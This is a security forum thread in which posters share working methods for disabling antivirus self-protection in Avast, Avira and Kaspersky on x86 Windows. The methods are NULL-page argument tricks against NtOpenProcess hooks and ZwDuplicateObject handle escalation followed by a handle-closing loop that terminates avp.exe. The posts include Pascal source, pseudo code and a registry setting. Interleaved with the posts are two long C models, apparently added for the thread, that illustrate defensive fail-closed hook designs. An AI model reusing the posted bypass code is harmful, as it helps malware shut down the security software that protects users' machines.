AV SP Discussion & Bypass

Forum for discussion about user-mode development.
R00tKit
Posts: 129
Joined: Tue Nov 16, 2010 8:23 pm

Re: AV SP Discussion & Bypass

Post by R00tKit » Thu Nov 29, 2012 8:29 am

send pm to 0x16/7ton
@R00tkitSMM

0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Thu Jan 03, 2013 8:07 pm

I want to share an interesting SP bypass method in Avast and Avira, for the x86 arch model.
In both antiviruses SP is based on hooking the NtOpenProcess function in the SSDT, to prevent terminating the protected process.
For example Avast just returns STATUS_ACCESS_DENIED, or Avira changes the access mask of the opened process handle (read/query only) when we try to open a protected process.
In the hook handler function, at the start they all check the input parameters of the NtOpenProcess function.
Here is the definition of it:


NTSTATUS NtOpenProcess
(
  _Out_     PHANDLE ProcessHandle,
  _In_      ACCESS_MASK DesiredAccess,
  _In_      POBJECT_ATTRIBUTES ObjectAttributes,
  _In_opt_  PCLIENT_ID ClientId
)
So I use a trick to fool the AV:
ProcessHandle and ObjectAttributes can be NULL pointers ;) Yes, I mean that Windows allows those parameters to be NULL and does not fail if we allocate memory with READ/WRITE access in the NULL region.
As a result the AV check is not executed (they think the incoming parameters are not correct), and they only pass control flow to the original function.
OK, here is the demo video:
http://www.sendspace.com/file/bibrzz
Have fuuun and also my regards ;)
Cause and effect

EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Fri Jan 04, 2013 10:56 am

Good old trick with a null pointer. Didn't think this would still work on someone. Won't work in Win8.

If anyone is interested, here is the old Pascal source. Only the Avira detect+kill code is missing.


var
  Status: NTSTATUS;
  addr: pointer;
  size: ULONG;
  cid: CLIENT_ID;
  attr: OBJECT_ATTRIBUTES;
begin
  // map one page at the lowest virtual address (a request at $1 rounds down to the NULL page)
  addr := pointer($1);
  size := $1000;

  Status := ZwAllocateVirtualMemory(NtCurrentProcess, @addr, 0, @size, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
  if (Status = STATUS_SUCCESS) then
  begin

    InitializeObjectAttributes(@attr, nil, 0, 0);
    cid.UniqueProcess := GetCurrentProcessId();

    // ProcessHandle and ObjectAttributes are passed as nil; the handle is written to address 0
    Status := ZwOpenProcess(nil, PROCESS_ALL_ACCESS, nil, @cid);
    if (Status = STATUS_SUCCESS) then
    begin
      ZwClose(PHANDLE(nil)^);
      MessageBoxW(0, 'Success', '', MB_OK);
    end;
    ZwFreeVirtualMemory(NtCurrentProcess, @addr, @size, MEM_RELEASE);
  end else
    MessageBoxW(0, 'ZWAVM fail', '', MB_OK);
end;
List of Avira 13 hooks.
NtClose
NtCreateKey
NtCreateSection
NtCreateThread
NtDeleteKey
NtDeleteValueKey
NtDuplicateObject
NtLoadKey
NtOpenProcess
NtOpenThread
NtQueryValueKey
NtReplaceKey
NtRequestWaitReplyPort
NtRestoreKey
NtSetContextThread
NtSetSecurityObject
NtSetValueKey
NtSystemDebugControl
NtTerminateProcess
Pretty banal, multiple ways to terminate using a valid full-access process handle.
Ring0 - the source of inspiration
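The two posts above describe the same failure from both sides: the hook only enforced its policy when NtOpenProcess's arguments looked well-formed, and forwarded everything else to the original function, so a NULL ProcessHandle (made writable by mapping the NULL page) switched the protection off. The C model below is an added example written for this thread, not code from either poster or from any vendor. It runs in user mode with no kernel API: the Windows access-mask and NTSTATUS values are reproduced as constants, PROTECTED_PID, ALLOWED_MASK and the request/result structs are hypothetical, and the "original" NtOpenProcess is a stand-in that grants whatever is asked. It contrasts the fail-open handler with one whose decision depends only on the target and the requested rights.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Values mirror winnt.h / ntstatus.h (assumption: standard Windows definitions). */
#define STATUS_SUCCESS                     0x00000000u
#define STATUS_ACCESS_DENIED               0xC0000022u
#define STATUS_INVALID_PARAMETER           0xC000000Du
#define PROCESS_QUERY_LIMITED_INFORMATION  0x1000u
#define PROCESS_ALL_ACCESS                 0x1FFFFFu

/* Hypothetical: the pid of the protected AV process and the rights it lets others hold on it. */
#define PROTECTED_PID  1234u
#define ALLOWED_MASK   PROCESS_QUERY_LIMITED_INFORMATION

/* NtOpenProcess arguments as a hook sees them; pointer fields hold raw addresses (0 == NULL). */
typedef struct {
    uint32_t  caller_pid;
    uintptr_t process_handle_ptr;     /* PHANDLE ProcessHandle */
    uint32_t  desired_access;         /* ACCESS_MASK DesiredAccess */
    uintptr_t object_attributes_ptr;  /* POBJECT_ATTRIBUTES ObjectAttributes */
    bool      has_client_id;          /* ClientId != NULL */
    uint32_t  target_pid;             /* ClientId->UniqueProcess when present */
} open_request_t;

typedef struct {
    uint32_t status;
    uint32_t granted_access;          /* valid only when status == STATUS_SUCCESS */
} open_result_t;

/* Stand-in for the original NtOpenProcess. The object DACL is not modelled, so it grants what
   was asked. A NULL PHANDLE is accepted, which is what happens once the NULL page is mapped. */
static open_result_t original_nt_open_process(const open_request_t *r)
{
    open_result_t out = { STATUS_SUCCESS, r->desired_access };
    if (!r->has_client_id && r->object_attributes_ptr == 0) {
        out.status = STATUS_INVALID_PARAMETER;   /* nothing identifies the target */
        out.granted_access = 0;
    }
    return out;
}

static bool is_foreign_open_of_protected(const open_request_t *r)
{
    return r->has_client_id && r->target_pid == PROTECTED_PID && r->caller_pid != PROTECTED_PID;
}

/* Fail-open handler, as the thread describes it: the policy runs only when the arguments look
   well-formed; anything else is forwarded untouched to the original function. */
static open_result_t hook_fail_open(const open_request_t *r)
{
    bool looks_valid = r->process_handle_ptr != 0 && r->object_attributes_ptr != 0 && r->has_client_id;
    if (looks_valid && is_foreign_open_of_protected(r) && (r->desired_access & ~ALLOWED_MASK) != 0) {
        open_result_t denied = { STATUS_ACCESS_DENIED, 0 };
        return denied;
    }
    return original_nt_open_process(r);
}

/* Fail-closed handler: the decision depends only on who is opened and which rights are
   requested. Pointer validity is the kernel's problem and never turns the policy off; the
   mask is clamped (Avira-style) before forwarding, so an odd-looking call cannot gain more. */
static open_result_t hook_fail_closed(const open_request_t *r)
{
    open_request_t fwd = *r;
    if (r->caller_pid != PROTECTED_PID) {
        if (!r->has_client_id || r->target_pid == PROTECTED_PID) {
            /* Target is the protected process, or cannot be resolved from ClientId (a real hook
               would resolve ObjectAttributes here): clamp rather than forward blindly. */
            fwd.desired_access &= ALLOWED_MASK;
        }
    }
    return original_nt_open_process(&fwd);
}

int main(void)
{
    /* Constructed request: NULL ProcessHandle/ObjectAttributes, full access on the protected pid. */
    open_request_t r = { 999u, 0, PROCESS_ALL_ACCESS, 0, true, PROTECTED_PID };
    open_result_t a = hook_fail_open(&r), b = hook_fail_closed(&r);
    printf("fail-open:   status=0x%08X granted=0x%06X\n", (unsigned)a.status, (unsigned)a.granted_access);
    printf("fail-closed: status=0x%08X granted=0x%06X\n", (unsigned)b.status, (unsigned)b.granted_access);
    return 0;
}
```

The point of the model is that the fail-open handler's `looks_valid` check is exactly the bypass: a request with NULL pointers reaches the original with PROCESS_ALL_ACCESS intact, while the fail-closed handler hands the same request on with the mask already clamped and leaves parameter validation to the kernel.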

rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: AV SP Discussion & Bypass

Post by rinn » Wed Apr 10, 2013 3:11 am

Hello.

Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)

Best Regards,
-rin

EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Wed Apr 10, 2013 6:30 am

rinn wrote:Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)
It will still work in XP, as no one is interested/motivated in an XP redesign.
Ring0 - the source of inspiration

rinn
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan

Re: AV SP Discussion & Bypass

Post by rinn » Wed Apr 10, 2013 7:13 am

EP_X0FF wrote:
rinn wrote:Bumping the old thread to add: trick with using NULL VA allocated memory should not be working after MS13-031 :)
It will still work in XP, as no one is interested/motivated in an XP redesign.
Hi.

Yes, true for 32 bit versions of Windows, because of NTVDM.

Best Regards,
-rin

0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Apr 10, 2013 9:26 am

Yeap patch :)
this man @Ivanlef0u (in twitter) found this:
on Windows 7 x86 the NULL page can still be mapped because the global var nt!MmLowVaMapping is 1
also we can control this global parameter:
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Hehe, and in the end it is not a problem to use another well-known method, for example passing function parameters in memory with the PAGE_GUARD attribute set
Cause and effect

EP_X0FF
Global Moderator
Posts: 4883
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by EP_X0FF » Wed Apr 10, 2013 9:53 am

0x16/7ton wrote: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
EnableLowVaAccess
And this:
Image File Execution Options [EnableLowVaAccess]
Without admin rights you cannot change it.
Hehe, and in the end it is not a problem to use another well-known method, for example passing function parameters in memory with the PAGE_GUARD attribute set
Does it still work with something? I know Comodo was vulnerable to this.
Ring0 - the source of inspiration

0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Wed Apr 10, 2013 10:03 am

I did not try other vendors, but I think some of them will be fooled.
Anyway, on x64 systems HIPS is totally weird shit and we don't need to use any tricks :D
Cause and effect

0x16/7ton
Posts: 50
Joined: Fri Apr 20, 2012 12:59 pm
Location: Russian Federation

Re: AV SP Discussion & Bypass

Post by 0x16/7ton » Sat May 11, 2013 12:01 pm

pikA kernelMode :)
Today I am gonna show another simple trick to fool AV.
OK, victim == Kaspersky 2013 with all latest updates (yeap really, I have a licensed version :D)

So as we already discussed, SP of all AVs is based on prohibiting opening of the protected process.
But of course, to provide some compatibility, they allow opening their process with some limited access.
OK, example:
Kaspersky allows opening its main (avp.exe) process with the PROCESS_QUERY_LIMITED_INFORMATION access mask.
And here is the simple trick:
we use the ZwDuplicateObject function to duplicate the handle of the opened process, but with another ACCESS_MASK (DesiredAccess)


NTSTATUS ZwDuplicateObject(
  _In_       HANDLE SourceProcessHandle,
  _In_       HANDLE SourceHandle,
  _In_opt_   HANDLE TargetProcessHandle,
  _Out_opt_  PHANDLE TargetHandle,
  _In_       ACCESS_MASK DesiredAccess,
  _In_       ULONG HandleAttributes,
  _In_       ULONG Options
);
Simple pseudo code:


//opening avp.exe
hProcess=OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION);
//duplicate new handle with full access
ZwDuplicateObject((HANDLE)CURRENT_PROCESS,hProcess,(HANDLE)CURRENT_PROCESS,&new_handle,PROCESS_ALL_ACCESS,DUPLICATE_SAME_ATTRIBUTES);
As a result we have a full-access process handle. So what can we do? For example, I am using this well-known method to force the process to terminate:


for (i = 0 ; i <= 4096 ; i++)
{
     HANDLE copy_handle;
     DuplicateHandle( new_handle, (HANDLE)i , NULL, &copy_handle, 0, FALSE, DUPLICATE_CLOSE_SOURCE);
}
I can't test now with other AVs and on other Windows versions (I am testing on Vista SP1 x86).
Also I did not make a video demo, but I attach a test sample, so if you want to try it, you are welcome :)
notes:
- in the attached sample only the GUI process avp.exe is terminated
- to terminate the service I think we need admin rights and to impersonate a thread with the SYSTEM SID token (S-1-5-18), otherwise ZwDuplicateObject returns STATUS_ACCESS_DENIED
Cause and effect
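The post above shows why filtering the access mask at NtOpenProcess alone does not hold: NtDuplicateObject checks DesiredAccess against the object's security descriptor, not against the rights the source handle carries, so a PROCESS_QUERY_LIMITED_INFORMATION handle can be re-issued with PROCESS_ALL_ACCESS, and DUPLICATE_CLOSE_SOURCE against the protected process's handle table is what the closing loop relies on (compare the Avira hook list earlier in the thread, which does include NtDuplicateObject). The C model below is an added example written for this thread, not code from the poster or from any vendor. It runs in user mode with no kernel API: the Windows access-mask, NTSTATUS and DUPLICATE_* values are reproduced as constants, PROTECTED_PID, ALLOWED_MASK and the handle/request structs are hypothetical, and the "original" NtDuplicateObject is a stand-in that grants whatever the DACL would (everything, since the DACL is not modelled). It shows the same policy re-applied on the duplication path, with the two sequences from the post as scenarios.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Values mirror winnt.h / ntstatus.h (assumption: standard Windows definitions). */
#define STATUS_SUCCESS                     0x00000000u
#define STATUS_ACCESS_DENIED               0xC0000022u
#define PROCESS_QUERY_LIMITED_INFORMATION  0x1000u
#define PROCESS_ALL_ACCESS                 0x1FFFFFu
#define DUPLICATE_CLOSE_SOURCE             0x1u
#define DUPLICATE_SAME_ACCESS              0x2u

/* Hypothetical: the protected AV process and the rights the policy lets others hold on it. */
#define PROTECTED_PID  1234u
#define ALLOWED_MASK   PROCESS_QUERY_LIMITED_INFORMATION

/* A process handle in this model: which process it refers to and which rights it carries. */
typedef struct {
    uint32_t object_pid;
    uint32_t granted_access;
} proc_handle_t;

/* NtDuplicateObject as the hook sees it, reduced to what the policy needs. */
typedef struct {
    uint32_t      caller_pid;
    uint32_t      source_process_pid;   /* whose handle table SourceHandle lives in */
    proc_handle_t source;               /* the object behind SourceHandle */
    uint32_t      desired_access;
    uint32_t      options;
} dup_request_t;

typedef struct {
    uint32_t      status;
    proc_handle_t handle;               /* valid only when status == STATUS_SUCCESS */
    bool          source_closed;
} dup_result_t;

/* Stand-in for the kernel: the new handle's rights come from DesiredAccess (checked against the
   object's DACL, not modelled), never from the source handle's own rights. */
static dup_result_t original_nt_duplicate_object(const dup_request_t *r)
{
    dup_result_t out = { STATUS_SUCCESS, { r->source.object_pid, r->desired_access }, false };
    if (r->options & DUPLICATE_SAME_ACCESS)
        out.handle.granted_access = r->source.granted_access;
    if (r->options & DUPLICATE_CLOSE_SOURCE)
        out.source_closed = true;
    return out;
}

/* Hook that re-applies the self-protection policy on the duplication path. */
static dup_result_t hook_nt_duplicate_object(const dup_request_t *r)
{
    dup_result_t denied = { STATUS_ACCESS_DENIED, { 0, 0 }, false };
    if (r->caller_pid == PROTECTED_PID)
        return original_nt_duplicate_object(r);      /* the AV's own calls are left alone */

    /* Closing handles inside the protected process is never something a foreign process needs. */
    if (r->source_process_pid == PROTECTED_PID && (r->options & DUPLICATE_CLOSE_SOURCE))
        return denied;

    /* A handle to the protected process may be duplicated, but never beyond ALLOWED_MASK. */
    if (r->source.object_pid == PROTECTED_PID) {
        dup_request_t clamped = *r;
        clamped.desired_access &= ALLOWED_MASK;
        clamped.options &= ~DUPLICATE_SAME_ACCESS;  /* SAME_ACCESS would sidestep the clamp */
        return original_nt_duplicate_object(&clamped);
    }
    return original_nt_duplicate_object(r);
}

/* Scenario from the post: a limited handle to the protected process is duplicated for full
   access. Returns the rights the caller ends up holding (0 on denial). */
static uint32_t escalate_via_duplicate(bool hook_installed)
{
    proc_handle_t limited = { PROTECTED_PID, PROCESS_QUERY_LIMITED_INFORMATION };   /* constructed */
    dup_request_t r = { 999u, 999u, limited, PROCESS_ALL_ACCESS, 0 };
    dup_result_t res = hook_installed ? hook_nt_duplicate_object(&r) : original_nt_duplicate_object(&r);
    return res.status == STATUS_SUCCESS ? res.handle.granted_access : 0;
}

/* Scenario from the post: a foreign caller duplicates an arbitrary handle out of the protected
   process's table with DUPLICATE_CLOSE_SOURCE. Returns whether the source handle got closed. */
static bool close_source_in_protected(bool hook_installed)
{
    proc_handle_t some_object = { 777u, 0 };                                       /* constructed */
    dup_request_t r = { 999u, PROTECTED_PID, some_object, 0, DUPLICATE_CLOSE_SOURCE };
    dup_result_t res = hook_installed ? hook_nt_duplicate_object(&r) : original_nt_duplicate_object(&r);
    return res.source_closed;
}

int main(void)
{
    printf("no hook:   dup grants 0x%06X, close-source %s\n",
           (unsigned)escalate_via_duplicate(false), close_source_in_protected(false) ? "succeeds" : "denied");
    printf("with hook: dup grants 0x%06X, close-source %s\n",
           (unsigned)escalate_via_duplicate(true), close_source_in_protected(true) ? "succeeds" : "denied");
    return 0;
}
```

The design choice worth noting is that the duplication hook does not trust the source handle's granted rights at all: it clamps DesiredAccess and clears DUPLICATE_SAME_ACCESS whenever the underlying object is the protected process, and it refuses DUPLICATE_CLOSE_SOURCE against that process's handle table outright, which is what makes the post's second loop fail even if a full-access handle had been obtained some other way.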
